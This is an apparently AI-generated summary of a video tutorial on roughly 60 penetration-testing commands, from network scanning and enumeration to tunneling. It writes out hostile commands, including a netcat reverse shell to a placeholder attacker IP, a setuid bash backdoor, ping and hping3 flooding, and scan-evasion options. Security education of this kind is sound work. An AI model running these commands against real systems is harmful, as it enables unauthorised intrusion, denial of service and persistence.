60 Hacking Commands You NEED to Know

NetworkChuckAbout 7 min readFeb 2, 2025Watch original
THE SUMMARYAI-generated

Key Concepts

Ping, Hping3, P Tunnel, TCP Dump, Vim, Nmap, Masscan, SSL, Dev Urandom, Whois, WhatWeb, Curl, Scamo (Bitdefender), Nikto, Gobuster, Sublist3r, WPScan, Amass, Git, Searchsploit, Bash, TCPDump, Tshark, Tmux, SSH, Netcat

Detailed Summary of Hacking Commands

Ping Command Enhancements

The video starts with the basic ping command, demonstrating its use to check if a host is up. It goes beyond the basics by showing how to modify the packet size using the -s flag (e.g., ping -s 1300 host) to test firewall capabilities. The -f flag is introduced to flood the target with packets (e.g., ping -s 1300 -f host), potentially overwhelming it.

Example: ping -s 1300 -f networkchuck.coffee (sends large packets and floods the target).

The iftop command is introduced as a bonus to visualize network traffic in real-time. It's installed using apt install iftop and run with iftop.

Hping3 for Advanced Packet Manipulation

Hping3 is presented as a more advanced ping tool. It's installed with apt install hping3. It allows flooding packets on specific ports (e.g., hping3 -V -c 1000 -p 80 -S --flood target_ip) to test web servers. It can also perform a fancy trace route using -V (verbose mode) and -1 for ICMP packets.

Example: hping3 -V -1 networkchuck.coffee (ICMP trace route).

Firewall evasion techniques are demonstrated using hping3, including using port 80 (-p 80 -S) for web traffic, UDP traffic with -d (data size), and TCP traffic with the -a (ACK flag) switch. The --baseport option allows changing the base port.

P Tunnel for TCP Tunneling over ICMP

P Tunnel is introduced as a tool to tunnel TCP packets over ICMP echo reply and request packets. It's installed with apt install p Tunnel. On the target side, p Tunnel is run. On the attacker side, p Tunnel -p target_ip -lp 8000 -da target_ip -dp 22 creates a proxy to forward traffic.

Example: Target: p Tunnel, Attacker: p Tunnel -p target_ip -lp 8000 -da target_ip -dp 22.

TCP Dump is used to capture and visualize packets in real-time. It's installed with apt install tcpdump and run with tcpdump -i any icmp to capture ICMP traffic.

Example: ssh -p 8000 networkchuck@localhost (SSH over the ICMP tunnel).

Vim Tricks for Command Output Manipulation (Tom Nom Nom)

Tom Nom Nom shares a trick to pipe command output to Vim using | vim -. This allows editing the output in Vim, using commands like %! to run the output through other commands (e.g., :%!sort to sort the output). gf opens a file under the cursor in a new buffer.

Nmap for Network Scanning

Nmap is used to scan networks and discover hosts. It's installed with apt install nmap. Basic scanning is done with nmap -sn target_network. Service discovery is performed with nmap -sV target. OS detection uses nmap -O target, but -Pn (no ping probe) is needed if ping is blocked. Hostname scanning is done with nmap -sL target_network.

Example: nmap -sn 192.168.1.0/24 (quick network mapping).

Nmap scripts are used for vulnerability scanning (nmap --script vuln target_host) and malware detection (nmap --script malware target_host). The -A switch performs OS detection, version detection, script scanning, and trace route. The -f switch fragments packets for evasion. The --source-port switch changes the source port. Decoys are used with nmap -D RND,10 target_host to generate random IP addresses.

Masscan for Fast Network Scanning

Masscan is introduced for fast network scanning. It's installed with apt install masscan. It's similar to Nmap but faster. Ports are specified, and the rate is set (e.g., masscan -p1-65535 192.168.1.0/24 --rate 10000). The --randomize-hosts switch changes the scan order. It can quickly find Telnet servers with masscan -p23 target_network.

Fun Commands (John Hanman)

John Hanman introduces the sl command, which displays a steam locomotive. It's a typo of ls. The /dev/urandom file provides a constant stream of random data. Aliasing ls to cat /dev/urandom is a prank.

Information Gathering Commands

The whois command provides information about a domain. It's installed with apt install whois. whatweb identifies the technologies used by a website. It's installed with apt install whatweb.

Curl for Web Interactions (Nahamsec)

Nahamsec highlights curl for its versatility. curl -I target retrieves headers. Custom headers can be set with curl -H "Authorization: Bearer token" target for API authentication.

Bitdefender Scamo AI Scam Detector

Bitdefender's Scamo is presented as a free AI-powered scam detector. It can be used in Facebook Messenger or on their website to check for suspicious messages, QR codes, and pictures. The video demonstrates how it can detect phishing emails.

Web Server and Directory Enumeration

Nikto is an open-source web server scanner. It's installed with apt install nikto. A basic vulnerability scan is performed with nikto -h target_host. Gobuster finds directories and files on a web server. It's installed with apt install gobuster. Directory enumeration is done with gobuster dir -u target_url -w wordlist.

Example: gobuster dir -u networkchuck.coffee -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Subdomain Enumeration

Seclists provides wordlists. It's installed with apt install seclists. Wget downloads files. It's installed with apt install wget. Gobuster can enumerate subdomains with gobuster dns -d target_domain -w wordlist. Sublist3r is another subdomain enumeration tool. It's installed with apt install sublist3r. It's run with sublist3r -d target_domain.

WordPress Scanning

WPScan scans WordPress sites for vulnerabilities. It requires an API token. It can enumerate users (wpscan --url target_url --enumerate u), plugins (wpscan --url target_url --enumerate p), and themes (wpscan --url target_url --enumerate t). Aggressive vulnerability scans can be performed with wpscan --url target_url --vp --plugins-detection aggressive --api-token YOUR_API_TOKEN.

Amass for Subdomain Enumeration

Amass is another tool for subdomain enumeration. It's installed with apt install amass. It's run with amass enum -d target_domain. Passive enumeration is done with amass enum -passive -d target_domain.

Git and Searchsploit

Git is used to clone repositories. It's installed with apt install git. Searchsploit searches for exploits. It's downloaded from GitHub using git clone repository_url. It's updated with searchsploit -u.

Bash Backdoor (John Hammond)

John Hammond demonstrates creating a Bash backdoor. chmod +s /bin/bash sets the set UID permission on Bash, requiring root privileges. Running bash -p then gives root access.

TCP Dump and Tshark for Packet Analysis

TCP Dump is used to capture traffic to a file with tcpdump -w capture.pcap -i eth0. Tshark is the command-line version of Wireshark. It's installed with apt install tshark. It can capture one packet with tshark -V -c 1 -i eth0. Filters can be applied with tshark -Y "http.request.method == GET" -i eth0.

Example: tshark -r capture.pcap -qz endpoints,ip (displays endpoint connections).

TCP streams can be followed with tshark -r capture.pcap -qz follow,tcp,ascii,7. Custom output fields can be specified with tshark -e ip.src -e ip.dst -e frame.protocols -T fields -r capture.pcap.

Tmux for Terminal Multiplexing

Tmux is a terminal multiplexer. It's installed with apt install tmux. It's started with tmux. Sessions can be detached with Ctrl+b d and reattached with tmux a. New sessions can be created and named with tmux new -s session_name. tmux ls lists sessions.

SSH for Remote Access and Tunneling

SSH is used to remote into systems. It can also run commands on remote systems with ssh user@host command. It can create a SOCKS proxy with ssh -D 1337 -C -q -N root@remote_host. Chromium can then be launched using the proxy.

Netcat for Reverse Shells and Chat Servers

Netcat is used for reverse shells. It's installed with apt install netcat-traditional. On the attacker side, nc -lvp port listens for a connection. On the target side, nc -e /bin/sh attacker_ip port creates a reverse shell. Netcat can also be used to create a simple chat server with nc -lvp port on one side and nc -v target_ip port on the other.

Synthesis/Conclusion

The video provides a comprehensive overview of 60 hacking commands, ranging from basic network utilities like ping and nmap to more advanced tools for packet manipulation, vulnerability scanning, and exploitation. It covers techniques for firewall evasion, information gathering, and maintaining persistence. The inclusion of expert insights and real-world examples makes the information actionable and valuable for both beginners and experienced penetration testers. The video emphasizes the importance of understanding the underlying concepts and using the tools creatively to achieve specific goals.

AI summaries can miss context or contain errors. Check important details against the original video.

Go a little deeper.

Have a question about this video? Load its transcript to open the video chat.